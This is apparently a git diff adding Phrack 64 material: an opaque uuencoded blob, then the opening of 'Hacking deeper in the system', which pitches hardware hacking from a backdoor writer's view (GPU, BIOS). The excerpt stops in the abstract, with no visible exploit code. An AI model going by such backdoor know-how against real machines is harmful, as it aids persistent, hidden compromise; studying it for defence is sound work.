+M%)4M3]2XP<>OO60<$LK'0U/(F)1<<Q""<HS"<%%S]BT:6U&2$>(85PJ7)VFX
+M3DLV%P3!/U'KAF-=\JBB*'45OP$-?,HY)CS^1JTR&8I7F#O8M,#6L4@,I::M
+M,X]'Q(N$Q\G@K*5QX2JRFH%K",+A8RM^.'V/L\6&&#D8OB9H`VI17,E)IH.O
+MR#EGC''2-1#][/2P*&DBEQC.LDZ+6F7J9:(1SQ@6AI$[3!BAT/D&DA#]+'#B
+MF:]0IR&_36$Z347[5$]?$+LOD7T50;,2W5G!,6:QM38(5/GR5KC8IMFVLPE*
+MM39!?NXZ`.%(-S`RU^7RAK:)RF>.,A-TS(<>2!4G>O0;F0/)?.IQ&9&S@/M^
+M^$#%#.*C879P">/_P`B+T.6J!8H1ORH"A:E\Q(8A>^_(515@28%N`VY7G=)&
+ME\#AQ0.?=D#W,1.+_\'/P6V\0]K^.?#[[W*A%.[_%,OX_6<A4\X-X_^C2'+_
+M']TEV0?X_O]^@>UP1_^SM:._M_[9^+]!7;N&GWA03Z^U0+3F_^N7X`>-_U(^
+MW/]E'_YDLL5R:?C]]Y$D]AFAXW4JI7@'P&,>>/BBV%CM3&;X>8Q<981[X1,3
+MA.W>>M3BFP?C")K'$QX`:E"X&UW0=EL'9XA:%O8UF-.):5W7R%<A4@/O5$=,
+M/#ZB%?EV,6WP0Q^0I1?Y[K)6";-HB6\D%WA6?K*[MYS)L*S)+#Q**+TOJ]@/
+M52ST9U6Z665!7AQ&`3ED#603V>TV$CT:*]Y,[#&(HAE<)HA:J/-3+Y7NP9C*
+M),LJ8%T@P6)9GFHY&OWC^/?89OQA3?\'CO^\G/]SI6P&GMGYK\QP_!]%VF=V
+MEQML;(=.ZXC/'=CNLQ[9HN-;IMVI#>9W2@W\5%OI+F:'>7R'+B2YYT-8P=D9
+M4A#AFI@WU_A\F!S#XM,S6`7[TA<GQ:"-B,JZ`W$'Q!RW>.SP67/*CS#Q\0^3
+M`#78/LEAG``[8/P7<N#LA]]_Y=CW7]G2</P?2?K8Y[\:NNU;_4?"X,(8_+[.
+MBN%.TL1&"YU7?T")F:^4L'@O3-Y;:RU0B+M9\]CG`;U\X[)7/"^P36A.[#3:
+MW.QRM38[/[\$]FD2OZ9!.R8++\\^7UU>>+E*I(&3!<\M7*A>FKT(!?S;@);6
+M;M$1<4+6"#2KQ@_)]GI/)?`\5/`4(&@)3".9P@?*GI@G4^EZ,O4R?R_%/9M"
+M(>+LY.(HV?*(I-+%ZD7A]:,[1CM4WZ#`@_15ZN?<3,9'$F6=^V(Y#9[!O2J@
+MBY(3G_D9K!8\C%NJ<"8T\)CR==Y"/+M;SH2.&6+R+/Z>10H4C_J.A!4!E1P4
+M:93S7I8@PO_*\!._K.X*?]?DNQZVN!(!84+1!)5Z*#?YH2*RS"K.0\5X8+D2
+M4I%8Z/3%41A(#AY+@%T"=DN4OY?S7!#H+@K5,HUF4M-2S?#(*A#.7A'5*U1<
+MTGB#=4.XMR.#(+.#(;$Z<-I[-#D1.IU1,L@BLMMEF9&1V=%6L8\^\Z&;7"R(
+M*\\O9`BUK1N,"W!251%MUL2H=.DZQ`/@1[3;,`1K=AMG9K9U#"-:[`74<`]'
+M$2_3W6)<2ZV)_1T%7R)E?'V;E[+/?40.@`A+4NO=&6II'58PC1[Z&,%EB(F;
+MKNG3"11:`/?SBR].O/P<&9O8FPC&SY+*041N]1U%=]?UM#RHY:[SHUI8T#"F
+MP].;>TO.<P&*FQ7-UZY)BX0'\%_%50^=W)(`8VW?A6R$(V>[MNN<7)\6=HD?
+MN_/<<;DK@VFF:PBG62'BR/;/A,1X643T["`9RY22Y@@O7*Q=7EI<J56O5L]?
+M6:F2U\*<I>KL?.3UQ:6%%4$V%/,GH4#XF;1DPYAQVM1.2@N=7JPMS;^X]-IB
+M[3S@K:12,S/GLBE58:?"V#FPY`@B1$Y[5:\NK-2>FUVX<&6I*@]^P42CMS>3
+M27X`,P623LMG(=9TCY3E*3G648"M-.HE+07)3JV%+W%V&,8!_`!A,=LFEU]:
+M[N\^-:8CNYV&BK/IISV7GW<<T/@]40_@0+<<#]N%[X&-.X&AS%.]YT^[(;'F
+M\]\]P/-UZ4@?W*^_,G*#^#B"GT;XE4C,_P??J*VYVF']#A#S]^_C]W_X[[_D
+M$N)G8(:__W,$*:9_/*5_"'7LJ_]LKI#)%7KT7\@5A]]_'DGZZU_\R9_#[0&X
+M/@_7@XG$2;A5/X)_C\#U&(?Z.EQ?.R7RAFF8AFF8AFF8AFF8AFF8AFF8AFF8
+MANDSEO[V9__R"Q'XLT4`#/`?>2B1>!/NQ^"JP%6KX0+MR]6EQ0CBR<'TC@N\
+M;QQ#O)7JU94>'"*>"5]P>$A<"58/?H32!>_%/S&22+S[,-P?X[Q&*GV]B],V
+M=?$!N.<']5X:[YT3]R_%^3Z1X#1^D]&($!C`QT$T3C(<G>]"[]&6]X%&!1KQ
+M_I?B;8D^<WGHCF;5;'\`C9]/<'G__,MQ/AZ.R`-U<9SI8GYV938"E$ET]7&2
+MZU]>O&[<LXCRTH_/N@#IT46,?V/3,O:F<1)H/(GW?6GH3JOEV'O1P)6V>?%\
+M/()WK.?Y#L-=N'AY<:DKP:\F>".$++`_XB5Y@;[$3RIX\KT?_U1"X$?2YV+\
+M7P]:[1H[OS.(QBF@T<%[#XT3QQ-OR+'1'8?R!)4`NIQ(?/00YP/O#T;:C;+X
+M0H++%\?T1."Y$Y99GQ`JP;P"7(_C\[MWSW/,8UTXN-9UO>:-9\<!Q:SWX*A_
+M</?\@\>N]N$L;WH^;8W/2:0'!#SRB/L+3T)-_P"9#W/V8^DQ<?4,JUCZSMS@
+M\B\FN"H+HOPA0?]88D]3%4MR"*&-^0WQ_N5]X(=IF(9IF(9IF(9IF(9IF(9I
+MF#ZKZ7IB^\=;'_QTZR<G=]:.;Z^.)FY?/+%]8?3XUGO'_O*?'CCV-Y!U8A>#
+MJ8^N;/_XQ1>6MWZ2WOW37TLD=JHGMK?NL(='MK?>9P\GM[>^CP];=R`2VTF\
+M><=_X-[?[6Q]/_*V^T?PLOO'0.]V]8/M^='CM[=^#T+"[>.CNS]*((T/`.X$
+MOFXBUA8ND]QEC$(].Y4W[P7&A\^\_M\3C\Y_;_O?'_WN%VYO''OC!\&_`M+#
+M6W>.;6_]$.K_\'/;[_Z0,[152?@/X_W.<7@,_@ON4.DCR.K\Z`ED'5C`ID"%
+M3W^>\_&?$#H_^MU'W_B!_\[MF\>V?_8.UO[A#C0?&C^Z^Q>/(.\?<=Z_I7(<
+MC$+O7?EHZ_W1:VOOO=7$R//>&5SF>.O>&8SPWWJ+HQ=V7P?TG2LGWOQ1D-K]
+MZ9,<^YMX_]Z;=X(OWM[Z?:0(M.\>'T6I[_X]E.W,$<A*[LP]";?1G;G'X49V
+MYD;A]N3.'#;E\9VY4W`[M3.'+3JY,W>"-7/N.&OF`YS9MP6S<T!RZ_T"<"I5
+M:NW^,RAA]^O(QUT.?$X`_SKF?65T]]^>2*`*3^TD>'E1E/\'Y.\^CD#5MWG)
+MC"CYQR=0!6_CX__L@?P.(O\9_-O^J\F[?HX75D7A'V)^870WV`/Y541^E2-7
+MWY;8OR-*UP3V[^Z!/?,$JO$[0M2X4K![!E&JWP;HVNUOK@'<._<@9>_]+WO7
+M`AY5=>?/Y,5D.I`@"`'17A0QP9!,0HCRLJ%E1"H@*JSU`[W>S-R9W#*Y=[QS
+M)R%*^HE#:M/9L:YBJ_VLE?I8O_U<W;I=B^M:6:1&MFQ%E[9LR[KL&G?'#GZE
+M*RKU0?;_/^=,YLP0$EX%'^>GA_N[Y_[/\YYS[B/W_YM4DB9:]D`J:5!R7V9.
+MTGG^\42?:\X!IZ;7F5;2.WY:.C.9E5C)2AS+2DSZ'\#B?HD'#R17W3>O^Y'U
+MVZ!$_(PU_>1D/!.1U3>JN7.Q/HU%)Y>Y>W8XU7W^_K$X5U8]Q*:+MW<EG,^%
+M;-BZ,.,UD$5F:OJ[D^D92/D?$5MT+>8/T\+?GUSE[7G-<:<2;[IQ@J02;[GQ
+M7-,6]ODWT2'^]>2J34GGWH>@4:MA:D`;6K`]+9-I>[[`V@-C(3/YMB\I<<CK
+MCV)>V`M0GS<G84-3S[V-Q\;36!@]K_!83)'P;W)!2?-6]:^_,]L1CT["CEB?
+MUQ&UZ97ET!%Q=\][3F.RC)V^_7R2?@,2I!('^5X4]OK@.,X8J/);XX"DN[#,
+M/C:K/AJ5/ZMNA6/IF]$`NA4R&(OT)6CE68.M3&N3:+LG]*['@MUN5E0IQK[G
+MC!$KE!F=S"YFX[G9ZU50P!M5;'#V.[48]T05S7!,=BA.P2[R8!>E$M4\W6.8
+M;@=-E_XA;.:\!&GA)#Q7D+9)2-O"TWZ]2NR3-56Y/H%FXQE.W_?QP$!B>VW!
+M>'L;4B2[W<E1=+%8[&8EO%G&\AD/^20[O:RHA3QR8"(;Z].J\F?7''[\/^%X
+M=NRR@9NBRX,;LX&"P.1A,$G=HY4)TXRF7K8I,Q]F%X["ANS4NHL7]P\3\Z?6
+M)LPH-I&.K7O:(35,R7G=_>M?R(ZK91/SQA6V5TE_7$:'%69X`<TPOA0ZRNTA
+M@PL['O)AMMMNNXQ`Z_P';X.KAQ>K\K\3:(K)4#68`:ZR_'$UB9:GK+Z1%D>O
+M%]_!TA(OEM&:7Y1,/`P9E.(%$'L%RSV;Y$Y4*O'7I7!BZY/)/DRPPZD?(L&8
+MO`0OE+(N[P&SS/6IQ"NEU')**I%AK"J5&&!L?"IQ#JMP92I1SY@WE;B2,6B.
+MRILC%@I9*Q/H$*(MW`/5S5TVGBYE%V8?UJ>>S;[T!;2+'#=;>3+%O?'^9_'U
+M^D>I>[Z+]O'^WM^\\QB]K#J>BF<N'ZAXYJJ!FI>A5^?U)?ZGE+V[[?/O(W2S
+MF^WM9)N]+'(/;AI@Y=J%Y*V;X2`OXKD'L:W=VZ&4(<MP*G,YTU6OJB_Q^UR9
+MKKPRJ<&W$^G%B4-U%7>406QR8^(#B'3M&=AWUUTO0\0[(X17C\'F1,-OASGV
+M7WS[>[Y]1CCV@HMV)38R,X<W.N/C?9RY"'J5DO->H)N)O#\R8Z#?*2E-?Q$6
+MDB0]5W#6SDK2'@0&0^BQ4G9-N*68#:KD,B_>3O)[K"WC8'X<&JCH>?PP9K#M
+M;+PSA-NAFFU@EVK:D,W)*>]Y[1NEZ2T?@95_5[%_9ZID5+%_3[%_GU.:2+LR
+M<$^W&\HK2W3O)4YI^BZT*\O>.8Z#O9X!IQ[V2Y-1;^;L9'PO+-FCTC>/HY5?
+M/`Z7U^2RW3"_EN.`O1'CFY*K]L$E\FJ6R@VI_'N!CTI_E:6:P%)U[X:LJS#5
+M?YQ%:^I-TCE2B58:6R6?Y%/RW\$BLRP9WPFECX64>"6A5YM#`P.9V<EENZ`"
+M'KI<O@L1TY*K]D`%:,0AM!@'N=.]JS^`O=+T\O?@6LU7\JOY!]K\;VUJNQ54
+M\5<25)38C0GQVEI=#>H1K4NG1O&(KJ+/E:%%C%MT6T5O(OI7+I2"ZHP;]*]V
+M%\;FXO]!^C^02)`%%AVC'CA@NN#"."'5%\9J<%\)LPCZFRKT",3IX1P/VU8\
+M&J-[M0J+NQ!*1J8`P2A(68[9,]-RK%/$"AOT;X"4E+/"J5W<0_1L`H">C038
+MX5P\XW&ASJS&T!+%M)18/-"&XI@V/<Y^XY45KZS&Z!L\N?C.-DMKQSO`K(M@
+M4)D95U;/-.T;N#').Q;-Q@IQX6'L5PQAOQCM!?-L7>!8+@Z:6O`_X7U("*LT
+M(2L6A\VH'2?8%<DITUX4GP&WSR1#8LT%0\=+2$A(2$A(2$A(2$A(2$A\>G'P
+M#.%,MUM"0D)"0D)"0D)"0D)"XK,*]!.N**ND/LQ>SDM\S*\9N=?'7,2+\5OF
+M2N;_6^&N)"T0?R7GBX"W<7X%\#LY7PI\,^<K@#_'^4K@O^;\:\#?X7P-\-$N
+MQF\"7L=Y$/@*SMN`.YQ'@-_K8O5T`W^0QT>!/^7";[E<U)7[-<J96_<>@?]!
+ML'E?X!\)-L5%N?AR@5<(O$K@BL!K!-XH\+D"7R3P:P1^@\##`K<$WB7PA,"3
+M1;GZ/RCPQP2;)P7^4X$_+_"?"_R7`B>W\H_'#D-XOIB0?X91]/,2_#B0D-]!
+MJ"DE1,./G_`S/PAW0]@$X3X(]T/`SP7Q>\57(?P;A#]"N'T4(8?<A)Q33L@#
+M$#9#Z/,0\M\0#GC(183Y9>.XK(8P#L(DPOS%\<O)"PD;I_A9%'ZN,@/"5#P'
+MA/G`HT\X:CO403@'POD0+H9P'F%^WNBC/ITP/W+\#*:6SP]U^=<6VN$`WW80
+M5469ZC#^%##P]C:5RX#SGW8F:D!S`A@;T*/XRTBJK1DQ_2C1:LS1G.$/JD90
+M-QW#Z0*KB!58JVH1S6Y7;3T:@:B@I5*!=--RC%"7BK]SJ+*J%1PQ+36FFT&4
+M,B@\%+5L!S\-TQT]>,1!3*1:9H#E&--O-JW8,$4.85!0\A`61U1@"!NA'KK9
+M8=B62:`/`KK1`?VDM4<C>@Q/S5J]JSULJ\%.S0XU4EWKF*/;D)K^2A4UB5V.
+MFA+L5^GH)W"J;<4=PX2<H;O7&0Z48-OT'].BFW7P+XT/,5UK(%2FFZAAJ'+8
+M"#(2YR0;$;9SS(I'\9=!<WLQ2ME7;<BL*#L8[82^Y"R;(=W2SLBO+J0Q3#B4
+MK54T[J`6/"60?\RQ`^U1NK4#;38ECA4YVH5`0D)"0D)"0D+B<X%"_3^JRP6/
+M<#W*R>G_E1Q-_Z\RQ[/Z?SG-N>'U__;!@]Q6J.0^[W#Z?\/K[CT$#WMK<%MQ
+M$KI[7^2Z>Q7Y;3\FW3U%Z(<3T=U3>!=6GH3NGD*U"DGEL'D,K[NG*.Q=$.*X
+M=?<*M`>/6W>/OZNBZ04<C^X>OM=JQ&U!'JB[A^=B6-V]%C*H&Y@N.7'=O8G>
+M]_UEQ<>AH0?EX7N0^5#Q)PHT]$IXP/<7^)YC-#DZW(U#'\]JZ.UN8,=/5$,/
+MYZG4T).0D)"0D)`X4S@!7:MDMS=Y0V72[WX8;PY[%[CQWW-+X-]D1<^.^*AG
+M\1DB,ZGW7S)CYM<[I8EMK@S^T_MJQ3-%&[?&,[VC\<:T=T^F.+&U)%G9\UK\
+M_52T9#/>O67EKS:[A9UT[UFH.+*/"X@\`KFGT9][8-4^+HX%L;LQ=C')D\;Z
+M"TBW&?]8RY2Q>IUI7FP.R@MPG86-+J9`</Y9J#V5U:-2F!Z5PA4\$ON5/OJ#
+M;Z@FXN;;DB+"Q+U0A6`L"N0<2'0?&*CH0>6-K/K`+\:BS?X%?_C9W[X>[^KS
+M[X?(44G_P7_DF=";="JD@G)%_@.8V7;,[*7>WV3->O_4\&K#@7*4Y/!F\XV-
+M977!&]J4?S\3>:&I.\>B<$2)LSYK>L58JM:2("4CE+OT&,K]L/)HY7Y02<NM
+MV#AZ`*4H:-R[E53DA6O*P,@9G_X;3)CX/F&]_@HU&,\$MA+[J]*_HHFY4L1M
+MA]E.9;X*&8K+W`X)M^"@W$']\X]7P^%H6A!7Z)&(5:M<9]F1(/YMM-#_GZ)R
+MWW?<$$YZXDE(2$A(2$A(2$A(2$A(2'PB(3WV)20D)"0D)"0D)"0D)"0^FU`@
+MG.<BY-"YA,SBW',N^TUUY/N!7UT$O/BVP>_>*THJZ7?37L[Q`YGQG&.&/R`Y
+MO8!G"?//Q^_%=W$^#?C;G%<#'\=]^&N!3^?<![R%\R;@JSF_%/@ZSN<#OYOS
+M%N!_S_DBX+_B_`K@?^)\*?!YO)[X.0_ZX5?`L1"TR^#\<N`M1<Q^!=C8//XP
+M]`-^E(,<OV\.$.H/3S_[_B;E[!/P'POQMQ;E^.2BG,WM0OQ4@7];X!<)]G\E
+MQ']/X#\0^,,"I_[Y`Q!^5DS(<CAC+T'X+82]$,Q1A"0@''`3\J-R0GX*X8=>
+MZ@^/OO#G\#&!WY#C-^SX_3;ZTZ-_/?K'XX<RZ$L_E8^?X?WCZ7<H^/F)&K&L
+MM?$H1,4<S79R7MS4(N;$6]56PPP:9EAMTR-1W2;<[EA\NH?VYA[*.3_KX2V=
+M]/_<3OK<>Y[V]A"^Z^V:,;0'O]%\:7-=6'?4:$!UVN+FVKK6=42-:ET12PMB
+MBIACV3KM9SQC>(([8!N)Z?I:=(G7S:S_.PX)HC)/?0D)"0D)"0D)"0D)CI**
+M,GQ2;T'NY1P?\\=SCH_Y2C'A#_2$-%5X:/P^X%=RW@^\C?,T\#LY1X^0S9P?
+M`/X<Y_CEP*\Y/P3\'<X_@J?8T8RCL[FKCG.HCVL%Y_#@ZG(XA[JY[N7UQ/@'
+M>3P$UU,N4L3=LEVON0:]RUUO"/RM'"\B.?NB"P2^1.#7";Q;X(\*_`F!_T3@
+M_R3P'4*YNX3XUP7>+_!W!?YACA<7"]PK\+,%?J[`+Q+X;(&W"/RK`K]&X&L$
+M'A*XF6M+\0:!]PHV]PO\1P)_7.!_)_!GA7-W!X1O0?@%M'T,A&H(,R!<"F$N
+MA"^!_6H([\!0;B*DM!G"`@@M$%9!V`+A)0@?$%(V'0*D+ZN'T`!A-@2P+[L*
+MPAH()H0HA#L)<4/^Y<]">(,03QA"A)`O/`WA7R'\CK!7("@_B*])\+4)NL^C
+MVSO*$J*[/KXVP=<H^+H$90=1BC`K+8BOVE"B,/M:!5^]7$+8JQ>4)<#7+"A/
+MB%(!Z/*/DH?XN\I05_JJ!NI-513P]0S*'Z(<(K2'OH8[T_62FHF?O-<Q)Z>9
+MR$W"$:M5BXP@HLC>^0UF0U_^A2Q;U8)@V:Z%AS&Q]78+ZI:UHOFRHDFN#KJC
+M:M`N>EYA5`7T6*P3SK<:=02K&+>*FT/;::T6OES,O0Z,@!U]:S5MZ:(O+VUH
+MO#1/`%*(%(4@<]$A6]<_F;*0N3I*>4B)(Q&P@GI]W#2BFJW5+]/6ZB$C<JK?
+ME_H`S4U-='M)\^R\+:)A=C-I\#7[9OD:9LUJ:B00X6MH((KO%-=C2,3Q#PV*
+M0DQ8?(:S&^DX;\O@]E,"6/GF>LK#@8`R\SK@"A\*=;!O97?FB088$8-ECEED
+M]\`D$%6HB%&K8=8;0:7-BCGSE$!;NQ54+NYDNYXSW5J)0N3-_^S9/,5ET/D^
+M>_91YO^LQEFS?87SOZ'!)^?_Z8#4_V.0^G^%>4C]/ZG_)_7_)"0D)"0D)#Y]
+MD/I_4O]/ZO])_3\)"0D)"0D)"0D)"0D)"0D&J?\G(2$A(2$A(2$A(2$A(?'9
+MA$*D_I_4_Y/Z?]+A7.K_?1XQI/]?7>"4EC&"_V]#4W-3H?_?K%G2_^^TX`+#
+M#$3B05V9'W."AE77=IDG+RIBM!;$=<7JG:ZH'LN/#@5,)W*D9;PP2QAJD&M^
+M'*X/,ZWZD.9@O*?#,H(*G^C5*%F@S,A>4FH\MWK*#=-1VO5:]).;YRF/FS$C
+M;.I!)6*98067`2L4BNG.`M\\CT?A,$+5U>VZLD#!!:(ZFUNM<I5ZS:+KKJE5
+M?#4URH(%RLR&&D]Y.2Y:U;X:R!O_ZVPS(GHU+B:00^UT++4V9MRB6Z%JY"QA
+M?@34L1Q*5'`7C_K6X0+<JNLAA1TL9T>4-L<R(]5?6;%*77G]"K^Z9-:ES5@L
+M34U7-"PRUZ3::_W^*]5K_2MKE*D+A*9BI85J\PSHRH<9**S2!96<6E#K(_-H
+MA4:OQ>ITXVZN..7B_*34^@1JG.OG;NQHNJ)#<HCHYH.`+_O5N$-//=.TJ#X_
+M[TO6->;Y+`T=&'!AJ4:B!6H5-GAF:!V#%&X[6$8\9RP].]3`#G?9)07W:N%_
+M3$!MG+AM*@VTG#,]9T\E\M;_:_P+%RWSG_(R1EC_&QLNN:1@_6]JG-4LU__3
+M@?H9'F6&@F->A?57-=K#6L"!*(Q=@D(\,)$<HT.#&:*$,&B.TE#G4^!N7;,-
+MN`HHRI*0XK3I+*9+,6)H4XM1IM*I8SZF#LNS8\'\C\!-NZ*9"I7X44*VU:X8
+MCD)]?4TM$NFJA8-!!3]TA_10$N9+;3&;3JB+K2MA"YX2,#O-<?3VJ(.4W^=#
+M918Z2A0F--R.8Q6@,@%X1H!+3DRQ0IB)K>.\ISE`WB'#CD$"6AEHW&!Q2J?A
+MM"E:WG&L+!A@)GP=A%M]#1\%%'QR`0JM;.UB^4+=V3-'W6!?XAVT9CISX7*T
+M$BMF%/0N1+5V.;IBV9`,^BSNV%HDFWRYY>ASLU<SZ/!.K#MT%?2E;@:T:"P>
+M8>73DU"+QVDOFM!-L9ANTT<ES"@/6BO<C\,9B"E*AQ8Q@O`$,P\:`\]76I#F
+M$=&U#GXJXE':YWAA#FCF$5EA]T%E<LT!XT!$,_`$T[-:"Q=A>K)C+)YUEF7J
+MM4?D1<O+ZQ@H-(KGL37"3E101\<&>*2`\YBM.795O0>?QXP`#BE/P:"NCCEV
+M'(8?[7<5U[OVF#(#CD7QB@!7#_=JG.,M(;MK+O7&CMF!^G5FO+XU%KQAFM(!
+M35D+P[0>_Z'/'76!W`U&_0QE*3SA8B]9<1N'8`@>@:"-FAUH@^MP`"X?,+;,
+MP=&!,CMU6.%L#A&XQ,`M`1S#0RCPA$E5+13")Z>N:JSHS,N,J-H1K?4HQXCJ
+MCG:5#5;5J<&N8(/RV#.8CHFP(L=1)E0SJH8B6EB9KJQ0%UY^^9+E2U9>7X/W
+M";0#Z>,@WNP%/EN7TD\E\J[_?'NJRQA)_Z795_C\UW1)D]1_.BT82O]ETRG0
+M?[GB./1?LOHA(^F_5$X@Y*HRV):=N/[+35,(60.);_(.I_^"-PV.L)^?Q];S
+M6".WCF'U'PHC:<ALY>_2MW[.-61NXOSSK"&SL?3T:LB@Z.M=4/&#!1HR93S@
+MWP#P_?YP&C)K1M"0J6X\.0T9G.M20^;TX\_A+X]K[JGTE[]^DN@O'YPRE+_\
+MIBE'^LM/GS22O[ROB'EN_U_54?WEJ9_W-]W,.1[*2B7L4I;HS2KJ&8^=D_YQ
+M5<[X>M%8Y\9;!..-S'C#_F\1;-A]S.^<5NB.*O0['XB7]_DW#0`RY4G_R\E5
+M.WO]FY+^33M>Y`[\/G0>]Q],^@_>?Z3[.\UH6=6@^_O]@NL[Y-M/\VWN\Q]`
+M-_Z<^_L!H1H?3F1N]X/FHX`0UKN)[3[N`@_#8</^^="D=&@4^L&'8#%)I?H/
+M#PST;MN"*P"ZN4.=2GJ]T])/0Y:#F50>Q7.?%G[WQ&S5*PL]][_<U[/[\`!%
+M)I2D)]^=ZJ$EYBI_&:2?Y^]WO(+QG`W=_5BC^'2J>0!,3.;%9$58+#0/#../
+ML*2TLI1MV([M7)UK>&)_)!TMPR;MH4WQ[W73S3ZV1]N9Z'87.Z,'!0">^I@*
+M`"2VNI-'*"_@\?43L`*[$MV[!N)C4HF_+&;1CV:3E0R=S$^3[4QT[Z3)'N+)
+M3$B62ORDF'5O*K&;Q]=/8)H';GK2M_]_>^<7&L41!O"U-=WD6AHH42N$=KRV
+M8=><QR6IILW9@(;3'DU0C"`T#>?E<A</[G:ON8T:2J`E#VT1:>E#GWT02M_R
+M5I&B+U9$+%CJ@Q0I/MB'DC[VP:)(Y_MF=N;;NTN,&"O8^>#,W.RWWWSSS9^]
+MFYOY*0)P':YLV`R-WAYP([>ELHME7X)D)PR5S)G/%LY<?7#^0O`B3UPX_^!J
+M\-HRU_];ZO]S'PI]::-XMWP?[KX"R5\VA'XDY,7O-JG@_7D'.\6M%3H%.K>P
+M*>P4MQH[!2]_5!J=YR5"Y;JP<DND<F]N@LIU@?)AJ3R*[BU!LA_<RYQ=7#AK
+M!^W\WU>"V/(^7A3O#\O#^/?VJ<R/H-D.FI=/9:[!FT%NX=W+=6ZS(FW>O0<V
+MST'R=_`R<^-TYM:BU74Z<W/1VB"#<<F"#GJS\_-VWC47%VY;P0O8Z[B=KZ6=
+MI7L0R.L;&UOOXRZ(U`W!C[A&ZE?EKHA8W)4FJNC*#7%_NYR&^KI@H*;:&NUN
+M1;MWB,%O[H4&C\I[NWG..>S7ERKA2%C\"T9MYY4O,_!7X"O6C5\Q5\_/%(?8
+M6W6V._RE<ICM!K+L,"XD3&R;9,7967\6=)(Q"W[L@14BT&"2:QSF4=1I%IT(
+M(+OLE<2^`B:9X6BW=U(8Y`(_!(&B7N&S++G..%V$I2KXT%EAOE>9M\H>KDV%
+M*Z..YP>`U#W./Y3F*ZZPN\^?\Z:YOV5<*6)BC4J6!;^7P#<96B;1LL(Z0+&!
+M[_-R9M0R)M09;*!O4'<VS3T!#_AWFR!?]MB4#TN<'BL/O+,+EUUKM0(3/\5)
+MC^'^(^&BJX]+N#-^`M9=N59#$&7@9+1%W;1_U5HE[\'Z)*^!6(\:8JF3;YV,
+M6>,GRH$PAC7#7Q;)BJY832-M54?]XJR_ZI?Q_X^T9+@\CAC^BQ$C1HP8,6+$
+MB!$C1HP8,?),B^&_&#%BQ(@1(T:,&#%BQ(@1(\^F,$MP7IPMFO\RM%GS7[IY
+M_F_/6=;+SXM][W]`FN>/=DLNS,9/U5[VSC;"A6DC7)BV9B[,M\!5L2WK*).,
+M&)LP8FS"B+$)(\8FC!B;,&)LPHBQ"2/&)HP8FS!B;,*(L0DCQB:,F#;!B`FY
+M,!,\#F>DSS6>7Y/Y7VP1G!=(9U_53)F]6R5'QA8<F469?Y'K?R73R2V:*0/[
+MG=?"E*$<&<J.^9ZDEU;@R/Q`\B^2]$\D_3-)_[H24^:R9,F\WZ9Y,J^W"Z9,
+MMV;*.);@Q0!;!O@QL*<<6#+;^2O!7SLLP91Q^:O7$O^W*8AARABFS)-GRN!.
+M02N'IRT!9V#EQ!XV*T?VF.5PSZ&%1R!SM0#TPW8O03,I\DRU6"W4YA6!!CD%
+M409-;B39_W9R8-=@/_?IP/CXB7PMZP4#_8\^9Z^GM#K_M\[XEX>=_]\YN+/Q
+M_/_.OD'#?_E/1)S_SV+/ET?\U195?<@?=*;FF3@?7:SPX58M>OE",>G/SL"Q
+M:Q:+K1=(!K)A9#TQO,P;T\42KP`;&]_OY%T6(D7D)M^/O'@B[RJEO:,'1CX8
+MSWZ88:F3?:E4+"8/D>NSU$Q."&EZ"?>R;@\GC;3$F>!<THIH$_JPR@9G\$O=
+MDV8=,8%/Z2.T%)S0I/EJ?29B.;HU&HR!1CIJ1:%T@)^BYD6DJ90$?T56$=J'
+MU:<`_%(N.3@1.J7I!.NI3Q&.CF2F[.@#/?FF/I6L!V@62PS#+/8$^R4'.#B)
+ML<S8WLPAESD.*.8"E_4X>(5M=U/NCF%Y70!?]&2-CD*P$BP*!<(MV2%XAM="
+M9U:*'L]G[U$5UJO=:6C2!"O4YJ#/0N1X,@?I7!#F(C%(@7"$)Z28!(O0<,@5
+MET7#U8'6P22C]*!T3'-]A/4>J:;@/J%_E.^C\U9HE)2BYX@G(`DDI*`K-H:4
+M1!,[W-1<:4*-E4GN]2>IA28X$^`MZO!(A%K)SD-BU0H9),MI\EQ0F1QJ$1%-
+MPE?N34(/75<CF6CL4$D9P-+(.P`414I$HI,NCVOKN<&EN*2%5H%MC252."MT
+M&]Q*JS$6F6&BV3B[,)YLBG`-NYD'\4T0W!)3?:%TS$W`1G^5S_7@`(!^+]LE
+M7X`J#F`@Q+PE\$AX$2,8TK3RQR?Z)UNAM.!6,2?%FTYBQ)4IJ#HQU;=64^$$
+M*2S!9!Y?[1R'*A"["?:`GM*QA`X+'3'P5I?8?.1#&!,SC^,%_K$*OR59S<^4
+M"[*O%?+U(MNWYW!N;,_^[,A0!*>EKHUD]^\9PVNRI!4.DL01"L:GROQ<):#Z
+MJQ\PB;NR-])'W`KG3>")H"KBA9T,F1T=_#.!@UV*I7G7VLU:Z,&5WEXUS,B@
+M7@,+C)$:R2,O<045H\VEP&NE*,"L)/%E+=J+5%+:C+8:_ZRK9D<DLV'C1(AL
+M0QV(1HN,$NU]6EQ5C=M@X."!(YE#!T4'Z*#CKLD"KZOR">KE\DCK9S#T=C&!
+MZWH^[/B/Z#:\6/&(4]9EV-,-CM/^M1;V6\.$I#ANO"+;'%W5GAXRP;AT)#_.
+MT20RZM=T0HGK"]?D$TX\`L33`N(3<2QZEDD41<?0P\\UP7!B#OT\Y6(IRNE'
+M.?:$[<A=)Y]TY,.9Q%5[K]6$Y^I9U,$?1D_[ZX81(T:,&#%BQ(B1IRS_`H%X
+&2GD`D`$`
+`
+end
diff --git a/phrack64/12.txt b/phrack64/12.txt
new file mode 100644
index 0000000..7deee47
--- /dev/null
+++ b/phrack64/12.txt
@@ -0,0 +1,1262 @@
+              _                                                _
+            _/B\_                                            _/W\_
+            (* *)            Phrack #64 file 12              (* *)
+            | - |                                            | - |
+            |   |       Hacking deeper in the system         |   |
+            |   |                                            |   |
+            |   |               by scythale                  |   |
+            |   |                                            |   |
+            |   |            scythale@gmail.com              |   |
+            (____________________________________________________)
+
+
+
+Contents
+
+	1.  Abstract
+	2.  A quick introduction to I/O system
+	3.  Playing with GPU
+	4.  Playing with BIOS
+	5.  Conclusion
+	6.  References
+	7.  Thanks
+
+
+
+1.  Abstract
+
+
+     Today, we're observing a growing number of papers focusing on hardware
+hacking. Even if hardware-based backdoors are far from being a good
+solution to use in the wild, this topic is very important as some big
+corporations are planning to take control of our computers without our
+consent using some really bad designed concepts such as DRM and TCPA.
+As we can't let them do this at any cost, the time has come for a little
+introduction to the hardware world...
+
+     This paper constitutes a tiny introduction to hardware hacking in the
+backdoor writers perspective (hey, this is phrack, I'm not going to explain
+how to pilot your coffee machine with a RS232 interface). The thing is
+even if backdooring hardware isn't a so good idea, it is a good way to
+start in hardware hacking. The aim of the author is to give readers the
